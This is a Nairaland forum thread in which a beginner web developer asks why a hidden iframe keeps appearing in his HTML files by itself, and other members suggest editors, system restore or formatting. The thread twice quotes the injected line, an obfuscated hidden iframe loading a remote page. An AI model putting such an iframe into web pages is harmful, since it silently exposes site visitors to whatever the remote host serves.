Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,150,284 members, 7,807,961 topics. Date: Thursday, 25 April 2024 at 12:12 AM

Please Help Me! My HTML Docs Is Misbehaving. - Programming - Nairaland

Nairaland Forum / Science/Technology / Programming / Please Help Me! My HTML Docs Is Misbehaving. (1403 Views)

Why Is My Html File Not Showing On Chrome / Gmail, Youtube, Google Docs And Other Services Go Down Simultaneously / How To Make My HTML Work Go Online? (2) (3) (4)

(1) (Reply) (Go Down)

Please Help Me! My HTML Docs Is Misbehaving. by concord129(m): 12:10pm On Mar 03, 2018
So anytime I make any HTML markup on my system, tested and satisfied with the result. If I close my editor to do other things maybe on the system or I shutdown my system, next is to come back and see my code adding more line of code I don't even know its usage;
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>

Thats what I get after closing and reopening my code, I also observe the code changes in size when I studied it in my folder before opening it. and the more the time I leave the code the more iframe tag I will get.
below is one of my code that's having the iframe included by itself.
Notice the increase in the file size, it all happened without any modification.

Pls help bosses

Re: Please Help Me! My HTML Docs Is Misbehaving. by Nascimento(m): 12:53pm On Mar 03, 2018
Uninstall and reinstall Bracket editor
Re: Please Help Me! My HTML Docs Is Misbehaving. by concord129(m): 1:39pm On Mar 03, 2018
Nascimento:
Uninstall and reinstall Bracket editor
I av tried that but its still the same. it started since I were using notepad then I downloaded notepad++ its still the same sublime text same now bracket.
Re: Please Help Me! My HTML Docs Is Misbehaving. by seunoni34(m): 12:21am On Mar 05, 2018
concord129:
So anytime I make any HTML markup on my system, tested and satisfied with the result. If I close my editor to do other things maybe on the system or I shutdown my system, next is to come back and see my code adding more line of code I don't even know its usage;
<iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>

Thats what I get after closing and reopening my code, I also observe the code changes in size when I studied it in my folder before opening it. and the more the time I leave the code the more iframe tag I will get.
below is one of my code that's having the iframe included by itself.
Notice the increase in the file size, it all happened without any modification.

Pls help bosses
Get another editor like netbeans etc or kuku throw the whole system away and get a new one.
Re: Please Help Me! My HTML Docs Is Misbehaving. by concord129(m): 7:17am On Mar 05, 2018
seunoni34:

Get another editor like netbeans etc or kuku throw the whole system away and get a new one.
I'm thinking of formatting the system maybe its virus but the fear of loosing all my tutorials and practice projects. boss ma send ma acct number make you send me money ma take buy another one.

1 Like

Re: Please Help Me! My HTML Docs Is Misbehaving. by seunoni34(m): 5:16pm On Mar 05, 2018
concord129:
I'm thinking of formatting the system maybe its virus but the fear of loosing all my tutorials and practice projects. boss ma send ma acct number make you send me money ma take buy another one.
Lol, I think its better to do a system restore first then if symptoms persist, format e danudanu grin grin
Re: Please Help Me! My HTML Docs Is Misbehaving. by concord129(m): 7:30pm On Mar 07, 2018
seunoni34:

Lol, I think its better to do a system restore first then if symptoms persist, format e danudanu grin grin

I don format am boss, unfortunately after the process windows defender detected virus inside all my HTML docs and deleted them. now I'm starting over again just so painful that all the practice I put in more effort to achieved are all gone. I don't feel like eating abeg no beg me o.

1 Like

Re: Please Help Me! My HTML Docs Is Misbehaving. by Nascimento(m): 10:13am On Mar 08, 2018
concord129:

I don format am boss, unfortunately after the process windows defender detected virus inside all my HTML docs and deleted them. now I'm starting over again just so painful that all the practice I put in more effort to achieved are all gone. I don't feel like eating abeg no beg me o.

Lolz. You dey beg person, make person no beg u? U funny my guy.
Well, repeat what you've done. As they say, 'repetition is good practice'.
Re: Please Help Me! My HTML Docs Is Misbehaving. by concord129(m): 3:13pm On Mar 08, 2018
Nascimento:

Lolz. You dey beg person, make person no beg u? U funny my guy.
Well, repeat what you've done. As they say, 'repetition is good practice'.
Ese gan ni sir, meanwhile help me check my today practice, please don't mind the UI. I'm just bad at that. Thanks boss...

Re: Please Help Me! My HTML Docs Is Misbehaving. by seunoni34(m): 6:49pm On Mar 08, 2018
concord129:

Eya sorry bro grin grin. Just make sure you get an anti-virus this time.

(1) (Reply)

Looking For Php Freelancers To Work On A Big Project With Me / IT Gurus Here Pls Help Me Answer This Question / Making A Crude Website API

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 19
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.